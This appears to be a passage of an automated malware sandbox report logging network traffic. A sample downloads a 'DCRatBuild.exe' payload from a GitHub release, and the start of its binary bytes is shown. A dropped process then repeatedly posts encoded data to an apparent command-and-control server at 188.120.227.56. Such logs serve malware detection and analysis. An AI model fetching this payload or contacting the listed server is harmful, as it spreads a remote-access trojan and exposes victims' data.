Dec 10, 2024 07:34:38.932765007 CET	2536	OUT	Data Raw: 55 5b 5f 53 55 43 53 51 5c 58 5b 56 51 5c 56 54 59 54 5e 49 56 5d 54 5f 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[_SUCSQ\X[VQ\VTYT^IV]T_[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU X(3%!.9?&6174:#);%5>& W+9?E'&,'Z!.[)0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.7	50018	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:39.568686008 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:39.916946888 CET	2116	OUT	Data Raw: 55 5b 5a 50 50 41 56 56 5c 58 5b 56 51 5b 56 56 59 50 5e 48 56 5d 54 5e 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U[ZPPAVV\X[VQ[VVYP^HV]T^[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU _+%!=!=&7!:(>X6>%_#"(.]$3>;'Z!.[),
Dec 10, 2024 07:34:40.938220024 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:41.175407887 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0a 28 26 06 1d 22 2c 32 0c 2d 2e 0d 0e 33 31 0a 42 28 2e 00 5f 31 14 2c 5e 28 2a 2f 13 35 29 3a 5e 2b 29 05 5f 3c 11 00 08 2a 39 2b 46 0c 1b 22 00 35 02 32 13 24 5d 3e 51 39 2e 33 11 2a 13 36 5f 22 2c 0f 50 27 12 23 11 22 3d 33 56 2a 2a 2f 01 25 13 3b 11 28 33 07 0f 20 3b 23 56 03 1f 26 0f 3f 01 04 1a 27 2f 0f 0d 27 3b 37 58 24 2b 38 05 28 2a 31 0a 30 00 2e 5f 27 38 20 50 2b 1f 21 13 31 01 01 05 3f 3e 3d 0b 30 33 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&(&",2-.31B(._1,^(/5):^+)_<9+F"52$]>Q9.36_",P'#"=3V/%;(3 ;#V&?'/';7X$+8(10._'8 P+!1?>=03#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.7	50020	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:39.689927101 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:40.042218924 CET	2536	OUT	Data Raw: 55 5d 5f 52 55 45 56 54 5c 58 5b 56 51 59 56 57 59 56 5e 40 56 53 54 5d 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: U]_RUEVT\X[VQYVWYV^@VST][[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ?"-"=66%'!:(<(2Y#=5^ 9;$'=>,'Z!.[)$
Dec 10, 2024 07:34:41.016011953 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:41.252193928 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	50025	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:41.495825052 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:41.854621887 CET	2536	OUT	Data Raw: 50 5f 5a 50 55 47 56 52 5c 58 5b 56 51 52 56 53 59 54 5e 42 56 5b 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P_ZPUGVR\X[VQRVSYT^BV[T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ^) :Z5===6]&Y,]#'+(.") /_9'C%==]/%'Z!.[)
Dec 10, 2024 07:34:42.822835922 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:43.055131912 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	50030	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:43.305587053 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2532 Expect: 100-continue
Dec 10, 2024 07:34:43.651774883 CET	2532	OUT	Data Raw: 55 59 5a 54 50 41 56 5d 5c 58 5b 56 51 5a 56 50 59 5d 5e 40 56 58 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UYZTPAV]\X[VQZVPY]^@VXTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU (96=.S)20] :,]?;2Y">=4'_-#'9,5'Z!.[)0
Dec 10, 2024 07:34:44.632543087 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:44.867389917 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	50035	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:45.115212917 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:45.463972092 CET	2536	OUT	Data Raw: 50 58 5f 57 55 47 53 51 5c 58 5b 56 51 5d 56 5f 59 52 5e 46 56 5b 54 5e 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: PX_WUGSQ\X[VQ]V_YR^FV[T^[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ^)3>5=.S*%&_2?'7:/(&\!&74-'0)\/%'Z!.[)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	50039	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:46.303693056 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2116 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:46.651458025 CET	2116	OUT	Data Raw: 50 5b 5f 52 55 46 53 50 5c 58 5b 56 51 58 56 55 59 55 5e 42 56 5f 54 5b 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: P[_RUFSP\X[VQXVUYU^BV_T[[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU#?&6X2)&X'/4^7:'+;!#.%#!.B$5X;%'Z!.[)
Dec 10, 2024 07:34:47.642323017 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:47.891375065 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 03 10 26 0c 3f 26 28 54 22 5a 3d 52 2f 2e 24 52 30 21 06 06 3f 3d 31 00 31 3a 38 58 28 07 38 01 20 39 36 5d 3f 29 01 5f 3c 01 32 0e 3f 39 2b 46 0c 1b 21 1c 22 38 2d 09 27 2b 22 51 3a 3d 27 13 28 3d 03 04 21 2c 22 09 33 02 33 59 20 2d 2f 53 28 00 33 01 27 2d 01 5b 29 20 3a 1d 34 11 23 56 03 1f 25 57 3c 06 39 09 27 11 0c 1f 32 01 37 5b 24 38 2f 1e 2a 29 2a 18 26 2d 3e 5c 33 2b 3c 1f 3c 0f 04 03 27 3f 3f 02 3f 03 3a 57 24 19 23 53 2a 05 20 55 03 32 56 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&?&(T"Z=R/.$R0!?=11:8X(8 96]?)_<2?9+F!"8-'+"Q:='(=!,"33Y -/S(3'-[) :4#V%W<9'27[$8/)&->\3+<<'???:W$#S* U2VP0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	50040	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:46.444421053 CET	293	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:34:46.792287111 CET	2536	OUT	Data Raw: 55 51 5f 55 50 46 56 54 5c 58 5b 56 51 58 56 55 59 56 5e 43 56 58 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UQ_UPFVT\X[VQXVUYV^CVXTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ^( .\6:U=%04]+(.]!=&7!,+ %>;'Z!.[)
Dec 10, 2024 07:34:47.783421040 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:48.023247957 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	50043	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:48.274549007 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2532 Expect: 100-continue
Dec 10, 2024 07:34:48.620500088 CET	2532	OUT	Data Raw: 55 58 5f 50 50 41 56 50 5c 58 5b 56 51 5a 56 57 59 54 5e 42 56 5d 54 58 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UX_PPAVP\X[VQZVWYT^BV]TX[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU )#[6S)=%/'#Z?8&#=. #9<'=%X.5'Z!.[),
Dec 10, 2024 07:34:49.606120110 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:49.839416027 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	50044	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:50.111931086 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:50.463951111 CET	2536	OUT	Data Raw: 55 5a 5f 54 55 47 53 51 5c 58 5b 56 51 58 56 5f 59 56 5e 44 56 52 54 59 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UZ_TUGSQ\X[VQXV_YV^DVRTY[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU \<3%5:S*5_%// 8\)8"!& !#.($-9/'Z!.[)
Dec 10, 2024 07:34:51.452209949 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:51.687386036 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	50045	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:34:51.928684950 CET	269	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 2536 Expect: 100-continue
Dec 10, 2024 07:34:52.276639938 CET	2536	OUT	Data Raw: 55 51 5f 5e 55 45 56 54 5c 58 5b 56 51 5c 56 5f 59 52 5e 45 56 5c 54 52 5b 5b 5b 5f 50 5c 59 51 5c 58 55 5b 56 58 54 5f 42 5e 5e 54 56 5f 54 42 5f 53 5b 5d 5f 5a 51 57 59 5a 51 51 55 58 50 58 54 5c 5c 5e 5f 5d 57 5c 5c 59 59 5e 5b 58 59 55 56 58 Data Ascii: UQ_^UEVT\X[VQ\V_YR^EV\TR[[[_P\YQ\XU[VXT_B^^TV_TB_S[]_ZQWYZQQUXPXT\\^_]W\\YY^[XYUVXVP^XYYUSXW[]\TUVZUP]\P_^XP[Z]ZYZ\ZQX]SZ_T]Z_Z\UR_S^_^[B\XV\FYVUY\^S[UYYZZWQ_^S_[ZBYXZTZ]WQYRUQ[Z\UZRXU ]+3)"1=9%4)(<(!6-9#1X9#E0%^.5'Z!.[)0
Dec 10, 2024 07:34:53.260946035 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:34:53.497664928 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:34:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 31 58 5c 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 41X\[0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49702	20.233.83.145	443	4656	C:\Users\user\Desktop\Dfim58cp4J.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 06:32:50 UTC	118	OUT	GET /GGGamessamp/fewfwe/releases/download/ZigZag/DCRatBuild.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
2024-12-10 06:32:50 UTC	961	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Tue, 10 Dec 2024 06:32:50 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/868158503/6f820ef3-3e4b-4829-b377-ecdaee20aaa7?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241210%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241210T063250Z&X-Amz-Expires=300&X-Amz-Signature=b7f80f409a9e7154f221e132ce7390b77b53623d533e4516ea18c9796aa45125&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DDCRatBuild.exe&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-10 06:32:50 UTC	3379	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49704	185.199.110.133	443	4656	C:\Users\user\Desktop\Dfim58cp4J.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-10 06:32:52 UTC	552	OUT	GET /github-production-release-asset-2e65be/868158503/6f820ef3-3e4b-4829-b377-ecdaee20aaa7?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241210%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241210T063250Z&X-Amz-Expires=300&X-Amz-Signature=b7f80f409a9e7154f221e132ce7390b77b53623d533e4516ea18c9796aa45125&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3DDCRatBuild.exe&response-content-type=application%2Foctet-stream HTTP/1.1 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-12-10 06:32:52 UTC	845	IN	HTTP/1.1 200 OK Connection: close Content-Length: 2351929 Content-Type: application/octet-stream Last-Modified: Sun, 10 Nov 2024 11:48:11 GMT ETag: "0x8DD017D8DB18C66" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: c689afba-c01e-0035-134a-4a8d41000000 x-ms-version: 2024-11-04 x-ms-creation-time: Sun, 10 Nov 2024 11:48:11 GMT x-ms-blob-content-md5: jp5bjcV8GklScafHZLyVIA== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=DCRatBuild.exe x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 0 Date: Tue, 10 Dec 2024 06:32:52 GMT X-Served-By: cache-iad-kcgs7200111-IAD, cache-ewr-kewr1740029-EWR X-Cache: HIT, MISS X-Cache-Hits: 7, 0 X-Timer: S1733812373.652844,VS0,VE8
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 78 5f 63 ed 3c 3e 0d be 3c 3e 0d be 3c 3e 0d be 88 a2 fc be 31 3e 0d be 88 a2 fe be b2 3e 0d be 88 a2 ff be 24 3e 0d be 9d 49 f0 be 3e 3e 0d be 9d 49 09 bf 2f 3e 0d be 9d 49 0e bf 2b 3e 0d be 9d 49 08 bf 08 3e 0d be 35 46 8e be 37 3e 0d be 35 46 9e be 3b 3e 0d be 3c 3e 0c be 29 3f 0d be c9 49 08 bf 0d 3e 0d be c9 49 0d bf 3d 3e 0d be c9 49 f2 be 3d 3e 0d be c9 49 0f bf 3d 3e 0d Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x_c<><><>1>>$>I>>I/>I+>I>5F7>5F;><>)?I>I=>I=>I=>
2024-12-10 06:32:52 UTC	1378	IN	Data Raw: fb ff ff 8b ce 2b c8 8b c3 d1 f9 2b c1 50 68 a3 00 00 00 e8 9d d4 00 00 50 56 e8 81 f4 00 00 56 e8 8c 2c 02 00 59 8d 8d a8 fb ff ff 8d 34 46 83 c6 02 8b c6 2b c1 d1 f8 2b d8 53 68 f0 35 43 00 56 e8 5a f4 00 00 56 e8 65 2c 02 00 33 c9 6a 58 66 89 4c 46 02 8d 45 a8 5e 56 51 50 e8 2d ee 01 00 8b 45 08 83 c4 10 8a 5d 18 8b 7d 10 89 45 ac a1 28 10 44 00 89 45 b0 8d 85 a8 fb ff ff 89 45 b4 8b 45 0c 89 45 d8 8d 45 a8 89 75 a8 89 7d c4 c7 45 c8 00 08 00 00 c7 45 dc 0c 08 01 00 50 84 db 74 08 ff 15 3c 30 46 00 eb 06 ff 15 44 30 46 00 8b f0 85 f6 75 2c ff 15 40 30 46 00 3d 02 30 00 00 75 1d 33 c0 66 89 07 8d 45 a8 50 84 db 74 08 ff 15 3c 30 46 00 eb 06 ff 15 44 30 46 00 8b f0 85 f6 5f 5e 0f 95 c0 5b c9 c2 14 00 55 8b ec 81 ec 2c 02 00 00 8d 45 fc 56 50 